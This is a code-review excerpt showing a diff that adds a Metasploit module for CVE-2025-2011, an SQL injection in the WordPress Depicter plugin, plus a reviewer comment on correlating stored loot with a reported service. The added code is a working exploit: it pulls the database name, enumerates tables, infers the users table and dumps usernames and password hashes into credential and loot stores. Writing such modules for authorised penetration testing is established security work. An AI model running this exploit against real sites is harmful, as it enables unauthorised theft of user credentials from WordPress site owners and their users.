modules/auxiliary/scanner/http/wp_depicter_sqli_cve_2025_2011.rb

```diff
@@ -0,0 +1,147 @@
+          ['WPVDB', '6f894272-3eb6-4595-ae00-1c4b0c0b6564'],
+          ['URL', 'https://cloud.projectdiscovery.io/library/CVE-2025-2011'],
+          ['URL', 'https://plugins.trac.wordpress.org/browser/depicter/trunk/app/src/Controllers/Ajax/LeadsAjaxController.php?rev=3156664#L179']
+        ],
+        'Actions' => [['SQLi', { 'Description' => 'Perform SQL Injection via admin-ajax.php?s=' }]],
+        'DefaultAction' => 'SQLi',
+        'DefaultOptions' => { 'VERBOSE' => true, 'COUNT' => 1 },
+        'DisclosureDate' => '2025-05-08',
+        'Notes' => { 'Stability' => [CRASH_SAFE], 'SideEffects' => [IOC_IN_LOGS], 'Reliability' => [] }
+      )
+    )
+  end
+
+  def run_host(_ip)
+    print_status('Retrieving database name via SQLi...')
+    db_name = extract_value_from_sqli('database()')
+    fail_with(Failure::UnexpectedReply, 'Failed to extract database name.') unless db_name
+    vprint_good("Database name: #{db_name}")
+
+    print_status('Enumerating tables for prefix inference...')
+    raw = 'group_concat(table_name) from information_schema.tables where table_schema=database()'
+    tables_csv = extract_value_from_sqli(raw)
+    fail_with(Failure::UnexpectedReply, 'Failed to enumerate tables.') unless tables_csv
+    print_good("Tables: #{tables_csv}")
+
+    visible_tables = tables_csv.split(',')
+    prefix = visible_tables.first.split('_').first
+    users_table = "#{prefix}_users"
+    print_status("Inferred users table: #{users_table}")
+
+    print_status('Extracting user credentials...')
+    limit = datastore['COUNT'].to_i
+    raw_creds = "group_concat(user_login,0x3a,user_pass SEPARATOR 0x0a) from (select * from #{db_name}.#{users_table} LIMIT #{limit}) as sub"
+    creds = extract_value_from_sqli(raw_creds)
+    fail_with(Failure::UnexpectedReply, 'Failed to extract credentials.') unless creds
+
+    data = creds.split("\n").map { |u| u.split(':', 2) }
+    table = Rex::Text::Table.new(
+      'Header' => users_table,
+      'Indent' => 4,
+      'Columns' => ['Username', 'Password Hash']
+    )
+    loot_data = ''
+    data.each do |user|
+      table << user
+      loot_data << "Username: #{user[0]}, Password Hash: #{user[1]}\n"
+      create_credential(
+        workspace_id: myworkspace_id,
+        origin_type: :service,
+        module_fullname: fullname,
+        username: user[0],
+        private_type: :nonreplayable_hash,
+        jtr_format: Metasploit::Framework::Hashes.identify_hash(user[1]),
+        private_data: user[1],
+        service_name: 'WordPress',
+        address: datastore['RHOST'],
+        port: datastore['RPORT'],
+        protocol: 'tcp',
+        status: Metasploit::Model::Login::Status::UNTRIED
+      )
+      vprint_good("Created credential for #{user[0]}")
+    end
+
+    print_line(table.to_s)
+    loot_path = store_loot(
+      'wordpress.users',
+      'text/plain',
+      datastore['RHOST'],
+      loot_data,
+      'wp_users.txt',
+      'WP Usernames and Password Hashes'
```

Comment:
If we `report_service` before calling `store_loot`, we can pass the reported service as the last parameter to `store_loot` to correlate them. e.g.
```
service = report_service( ... )
store_loot( ..., service)
```